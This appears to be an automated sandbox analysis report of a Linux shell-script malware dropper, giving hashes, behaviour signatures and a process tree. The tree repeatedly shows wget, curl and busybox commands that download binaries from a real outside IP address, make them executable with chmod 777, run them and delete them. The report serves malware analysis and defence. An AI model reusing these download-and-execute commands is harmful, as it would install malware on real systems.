Analysis
-
max time kernel
19s -
max time network
22s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
-
Size
10KB
-
MD5
28c4eef7e1bf06ceb5d700dae0b1904f
-
SHA1
8a4772667d8bbf3722d092d56e59e402d2e3e503
-
SHA256
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3
-
SHA512
676f4792c15b78d5d2cab13afd6afca0936a62b130ef8c82785ff6d25875114a96a7316fee523c56633a748dc1e54b1425a99bd11427568faf75526d82fee445
-
SSDEEP
192:lSS5IXtliZl7j5NSFlXO5NSFlVhJtliZlR:lS8IE89w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 747 chmod 819 chmod 825 chmod 741 chmod 831 chmod 838 chmod 845 chmod 857 chmod 851 chmod 683 chmod 777 chmod 794 chmod 801 chmod 807 chmod 724 chmod 761 chmod 813 chmod -
Executes dropped EXE 17 IoCs
ioc pid Process /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg 685 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 726 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb 742 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE 748 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm 762 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO 778 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM 796 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY 802 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB 808 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi 814 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 820 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D 826 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA 832 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF 840 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D 846 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA 852 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF 858 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF -
Checks CPU configuration 1 TTPs 17 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg curl File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO curl File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB curl File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D curl File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA curl File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF curl File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 curl File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm curl File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM curl File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY curl File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi curl File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 curl File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb curl File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA curl File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF curl File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D curl File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE curl
Processes
-
/tmp/5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh/tmp/5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh1⤵PID:651
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:681
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:687
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:721
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:727
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:739
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:746
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:758
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:765
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:774
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:779
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:781
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:791
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:800
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:806
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:812
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:818
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:824
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:830
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:836
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:844
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:850
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:856
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:861
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97